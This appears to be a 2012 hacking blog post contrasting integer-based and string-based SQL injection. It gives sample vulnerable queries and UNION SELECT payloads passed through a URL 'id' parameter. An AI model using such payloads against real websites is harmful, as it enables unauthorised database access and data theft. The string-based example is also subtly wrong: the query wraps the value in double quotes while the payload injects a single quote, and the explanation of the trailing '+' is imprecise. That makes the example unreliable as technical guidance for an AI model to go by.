Difference between integer based and string based SQL injection ~ r00t@~Technomania

Friday, August 10, 2012

Difference between integer based and string based SQL injection

Raj

Hi friends this one i had posted a question on hackforums about difference between string based and integer based SQL injection it can be explained as follows
integer

SELECT * FROM pages WHERE page_id=10 [inject] order by title limit 1,1 

so the injection would be
?id=10 union select 1,2,3--
finallly you get
SELECT * FROM pages WHERE page_id=10 union select 1,2,3-- order by title limit 1,1

string

SELECT * FROM pages WHERE page_id="10" [inject] order by title limit 1,1 

so the injection would be
?id=10' union select 1,2,3--+
final:
select * from pages where page_id="10"' union select 1,2,3--+ order by title limit 1,1

so in integer based SQL injection you dont have to put a ' and in string based SQL injection you have to put a ' and a + sign at the end
the original post here
enjoy

r00t@~Technomania

Friday, August 10, 2012

Difference between integer based and string based SQL injection

0 comments:

Post a Comment

My project

What is your favorite hacking method

link exchange

download our app

Popular Posts

Followers

Blog Archive